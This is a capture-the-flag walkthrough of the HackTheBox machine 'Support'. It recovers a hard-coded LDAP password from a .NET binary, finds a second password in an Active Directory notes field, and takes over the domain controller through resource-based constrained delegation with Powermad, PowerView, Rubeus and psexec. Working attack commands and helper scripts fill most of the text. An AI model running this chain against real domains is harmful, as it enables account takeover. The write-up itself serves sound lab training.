Support

Enum

nmap

IP=10.10.11.174

sudo nmap -T4 -A -v -oN nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -oN vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -oN alltcp --min-rate 1000 $IP
sudo nmap -A -v -p- -oN alltcpslow $IP
echo "-----------------------------------------------------"
echo "TCP is done, starting UDP (slowwwwww)"
echo "-----------------------------------------------------"
sudo nmap -T4 -sU -A -vv -p- -oN udp --min-rate 1000 $IP

SMB

nxc smb 10.10.11.174 -u 'random' -p '' --shares

We can read the support-tools share even with a made-up user (guest/null session). List it with impacket's smbclient.py:

smbclient.py random@10.10.11.174
drw-rw-rw-          0  Wed Jul 20 13:01:06 2022 .
drw-rw-rw-          0  Sat May 28 07:18:25 2022 ..
-rw-rw-rw-    2880728  Sat May 28 07:19:19 2022 7-ZipPortable_21.07.paf.exe
-rw-rw-rw-    5439245  Sat May 28 07:19:55 2022 npp.8.4.1.portable.x64.zip
-rw-rw-rw-    1273576  Sat May 28 07:20:06 2022 putty.exe
-rw-rw-rw-   48102161  Sat May 28 07:19:31 2022 SysinternalsSuite.zip
-rw-rw-rw-     277499  Wed Jul 20 13:01:07 2022 UserInfo.exe.zip
-rw-rw-rw-      79171  Sat May 28 07:20:17 2022 windirstat1_1_2_setup.exe
-rw-rw-rw-   44398000  Sat May 28 07:19:43 2022 WiresharkPortable64_3.6.5.paf.exe

All of these look to be standard tools except UserInfo.exe.zip, which is custom.

Let's download it and take it apart.

Reversing

Decompiling UserInfo.exe in dotPeek, we can see the program queries LDAP to check whether a user exists.

To bind it calls Protected.getPassword(). Viewing that class shows the bind password is stored inside the binary, merely obfuscated:

using System;
using System.Text;

#nullable disable
namespace UserInfo.Services
{
  internal class Protected
  {
    // Base64 blob and XOR key are both hard-coded in the assembly.
    private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";
    private static byte[] key = Encoding.ASCII.GetBytes("armando");

    public static string getPassword()
    {
      byte[] numArray = Convert.FromBase64String(Protected.enc_password);
      byte[] bytes = numArray; // same array, decoded in place
      // Each byte: ciphertext ^ key[i mod 7] ^ 223 (a repeating-key XOR, not encryption)
      for (int index = 0; index < numArray.Length; ++index)
        bytes[index] = (byte) ((int) numArray[index] ^ (int) Protected.key[index % Protected.key.Length] ^ 223);
      return Encoding.Default.GetString(bytes);
    }
  }
}

So after base64-decoding the blob, every byte is XORed with the repeating key armando and then with the constant 223 (0xDF). XOR is commutative, so the order doesn't matter, and key byte ^ 223 is simply another fixed seven-byte key: this is obfuscation, not encryption, and anyone with a copy of the binary recovers the credential.

A simple CyberChef recipe (From Base64, XOR with key armando, XOR with 0xDF) gives the plaintext:

ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
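The same decode as a small script, added here as a reproducible alternative to the CyberChef recipe. This is added example code, not part of the original writeup or of UserInfo.exe; the only inputs are the blob, the key and the constant 223 lifted from the decompiled Protected class. Because XOR is its own inverse, one routine both strips and re-applies the layer, which gives a built-in check that the recipe is right: re-encoding the recovered password must reproduce the stored blob.

```python
import base64

# Values lifted from the decompiled Protected class above; nothing else is assumed.
ENC_PASSWORD = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"
KEY = b"armando"
CONST = 223  # 0xDF, the fixed byte XORed in after the key byte


def xor_layer(data: bytes, key: bytes, const: int = CONST) -> bytes:
    """Apply the transform from Protected.getPassword(): byte i is XORed with
    key[i mod len(key)] and then with const. XOR is an involution, so the same
    call both strips and re-applies the layer."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] ^ const for i, b in enumerate(data))


def effective_key(key: bytes = KEY, const: int = CONST) -> bytes:
    """The two XOR steps collapse into one repeating key (key[i] ^ const), which is
    why the extra constant adds nothing: this is obfuscation, not encryption."""
    return bytes(k ^ const for k in key)


def decode_password(enc_b64: str = ENC_PASSWORD, key: bytes = KEY, const: int = CONST) -> str:
    """Base64-decode the stored blob and remove the XOR layer.
    Encoding.Default on the target is an ANSI code page; latin-1 is byte-for-byte
    identical for the ASCII output we get here."""
    return xor_layer(base64.b64decode(enc_b64), key, const).decode("latin-1")


def encode_password(plaintext: str, key: bytes = KEY, const: int = CONST) -> str:
    """Inverse direction: the blob the binary would store for a given plaintext.
    Round-tripping the recovered password back to ENC_PASSWORD confirms the recipe."""
    return base64.b64encode(xor_layer(plaintext.encode("latin-1"), key, const)).decode("ascii")


if __name__ == "__main__":
    password = decode_password()
    print("ldap:" + password)
    print("effective key:", effective_key().hex())
    assert encode_password(password) == ENC_PASSWORD
```

Running it prints the same ldap credential as the CyberChef recipe; the effective-key line shows the seven bytes that actually protect the secret, which is all a reverser needs once the binary is in hand.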

LDAP

Let's dump some data from LDAP using nxc with the recovered credential:

nxc ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --query "(objectCategory=*)" ""

Something that looks like a password turns up in the info attribute (that is the "Notes" text box on a user object in Active Directory Users and Computers). Narrow the query to objects that have it set:

nxc ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --query "(info=*)" ""

Or with ldapsearch: first list the naming contexts anonymously, then bind with the ldap account (-x selects a simple bind rather than SASL) and dump the domain:

ldapsearch -H ldap://support.htb -x -s base namingcontexts
ldapsearch -H ldap://support.htb -x -D 'ldap@support.htb' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" | less

The relevant entry:

info: Ironside47pleasure40Watchful
sAMAccountName: support

So we have a second credential pair:

support:Ironside47pleasure40Watchful

Let's authenticate as support with it.


EASILY

user flag

8c9....66f

Run the remote BloodHound ingester for more info:

sudo bloodhound-python -u 'support' -p 'Ironside47pleasure40Watchful' -ns 10.10.11.174 -d support.htb -c all --zip

BloodHound shows that support is a member of the "Shared Support Accounts" group, and that group has GenericAll over the DC computer object.

GenericAll over a computer object is a well-known primitive, and BloodHound's help text for the edge describes the abuse: resource-based constrained delegation (RBCD). We write the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute so that a computer account we control is trusted to impersonate users to the DC, then use S4U2Self/S4U2Proxy to obtain a service ticket for Administrator to cifs/dc.support.htb. The only other requirement is being able to create a computer account, which any authenticated user can do by default because ms-DS-MachineAccountQuota is 10.

We need Powermad, PowerView and Rubeus. Clone them on the attack box (PowerView.ps1 lives under PowerSploit/Recon/), upload the three files to the target with the shell's upload command (evil-winrm has one), then dot-source the two PowerShell modules:

git clone https://github.com/r3motecontrol/Ghostpack-CompiledBinaries.git
git clone https://github.com/Kevin-Robertson/Powermad.git
git clone https://github.com/PowerShellMafia/PowerSploit.git
upload PowerView.ps1
upload Powermad.ps1
upload Rubeus.exe
. .\PowerView.ps1
. .\Powermad.ps1

Create a fake computer object with Powermad, grab its SID, build a security descriptor that grants that SID full control, and write the descriptor into the DC's msDS-AllowedToActOnBehalfOfOtherIdentity attribute:

New-MachineAccount -MachineAccount fakecomp -Password $(ConvertTo-SecureString 'password123!' -AsPlainText -Force)
$fakesid = Get-DomainComputer fakecomp | select -expand objectsid
$fakesid
# SDDL: owner BUILTIN\Administrators (BA), one allow ACE giving fakecomp$ full control
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($fakesid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc.support.htb | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
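To see what the opaque $SDBytes blob actually contains, here is an added example (my own code, not from the writeup, PowerView or .NET) that builds a self-relative security descriptor with the same content as that SDDL string in pure Python, and parses one back into the list of SIDs allowed to delegate. The computer SID is a constructed placeholder. The layout follows MS-DTYP; .NET's GetBinaryForm may order the pieces differently, but the offsets in the header make the two equivalent. The code does not touch LDAP: writing the value is still the Set-DomainObject step above, and reading the attribute back and running it through allowed_delegators() is how a defender audits who may act on behalf of a host.

```python
import struct

# ACCESS_MASK for full control over a directory object; this is what the SDDL
# rights string CCDCLCSWRPWPDTLOCRSDRCWDWO from the PowerView step expands to:
# CC DC LC SW RP WP DT LO CR = 0x000001FF, SD RC WD WO = 0x000F0000.
FULL_CONTROL = 0x000F01FF
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION = 2  # no object-specific ACEs, so the plain ACL revision suffices

# Constructed placeholder for the fake computer's SID (not the real box's value).
EXAMPLE_COMPUTER_SID = "S-1-5-21-1111111111-2222222222-3333333333-5601"


def sid_to_bytes(sid: str) -> bytes:
    """Encode a textual SID such as S-1-5-21-...-5601 in its binary form."""
    parts = sid.split("-")
    if len(parts) < 3 or parts[0].upper() != "S":
        raise ValueError("malformed SID: %r" % sid)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    if revision != 1 or len(subs) > 15:
        raise ValueError("unsupported SID: %r" % sid)
    return (struct.pack("<BB", revision, len(subs))
            + authority.to_bytes(6, "big")            # IdentifierAuthority is big-endian
            + struct.pack("<%dI" % len(subs), *subs))  # sub-authorities are little-endian


def bytes_to_sid(buf: bytes, off: int = 0) -> str:
    """Decode a binary SID starting at buf[off] back to its textual form."""
    revision, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d%s" % (revision, authority, "".join("-%d" % s for s in subs))


def build_rbcd_descriptor(delegate_from_sid: str, owner_sid: str = "S-1-5-32-544") -> bytes:
    """Self-relative security descriptor with the content of
    O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<delegate_from_sid>): owner
    BUILTIN\\Administrators, one ACCESS_ALLOWED ACE granting full control to the
    delegating computer, no group and no SACL."""
    owner = sid_to_bytes(owner_sid)
    trustee = sid_to_bytes(delegate_from_sid)
    # ACE: type, flags, size, mask, then the trustee SID
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(trustee), FULL_CONTROL) + trustee
    # ACL: revision, sbz1, size, ace count, sbz2, then the ACEs
    acl = struct.pack("<BBHHH", ACL_REVISION, 0, 8 + len(ace), 1, 0) + ace
    owner_off = 20                     # the 20-byte header is followed by the owner SID
    dacl_off = owner_off + len(owner)  # then the DACL; group and SACL offsets stay 0
    header = struct.pack("<BBHIIII", 1, 0, SE_DACL_PRESENT | SE_SELF_RELATIVE,
                         owner_off, 0, 0, dacl_off)
    return header + owner + acl


def allowed_delegators(sd: bytes):
    """Parse a self-relative SD (e.g. the raw msDS-AllowedToActOnBehalfOfOtherIdentity
    value read back from LDAP) and return [(sid, mask)] for each ACCESS_ALLOWED ACE.
    An empty list means nobody is permitted to act on behalf of the host."""
    revision, _, control, _, _, _, dacl_off = struct.unpack_from("<BBHIIII", sd, 0)
    if revision != 1 or not (control & SE_DACL_PRESENT) or dacl_off == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, dacl_off)
    out, off = [], dacl_off + 8
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            mask = struct.unpack_from("<I", sd, off + 4)[0]
            out.append((bytes_to_sid(sd, off + 8), mask))
        off += ace_size  # ace_size lets us skip ACE types we do not interpret
    return out


if __name__ == "__main__":
    sd = build_rbcd_descriptor(EXAMPLE_COMPUTER_SID)
    print(len(sd), "bytes:", sd.hex())
    for sid, mask in allowed_delegators(sd):
        print("allowed to delegate: %s (mask 0x%08X)" % (sid, mask))
```

For a 5-sub-authority domain SID the descriptor is 80 bytes: 20 header, 16 for the BA owner, 8 ACL header, 8 ACE header and 28 for the trustee SID. That is the size PowerView sends to the DC, and anything in that attribute on a domain controller that is not expected is worth an alert.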

Next, compute the RC4 (NT) hash of the fake computer's password with Rubeus; the S4U step only needs the hash, not an interactive logon:

.\Rubeus.exe hash /password:password123! /user:fakecomp /domain:support.htb

Take the rc4_hmac value and run the S4U chain: S4U2Self as fakecomp$ for administrator, then S4U2Proxy to cifs/dc.support.htb, injecting the resulting ticket into the current session (/ptt):

.\Rubeus.exe s4u /user:fakecomp$ /rc4:8119935C5F7FA5F57135620C8073AACA /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt

Even with the ticket injected, this session still doesn't have the access we want.

Maybe we can do it remotely instead. Rerun Rubeus with /nowrap so the base64 ticket is printed on a single line that is easy to copy:

.\Rubeus.exe s4u /user:fakecomp$ /rc4:8119935C5F7FA5F57135620C8073AACA /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt /nowrap

Copy the base64 ticket from the final S4U2Proxy output into a file (b64.kirbi) on the attack box and decode it:

base64 -d b64.kirbi > ticket.kirbi

Convert it with impacket

impacket-ticketConverter ticket.kirbi ticket.ccache

Point KRB5CCNAME at the ccache so psexec.py uses the ticket (-k -no-pass) and run it against the DC by its FQDN. The name must resolve (add dc.support.htb to /etc/hosts if needed) and must match the SPN the ticket was issued for, cifs/dc.support.htb:

KRB5CCNAME=ticket.ccache psexec.py support.htb/administrator@dc.support.htb -k -no-pass

Final flag

b7c4....f8d39d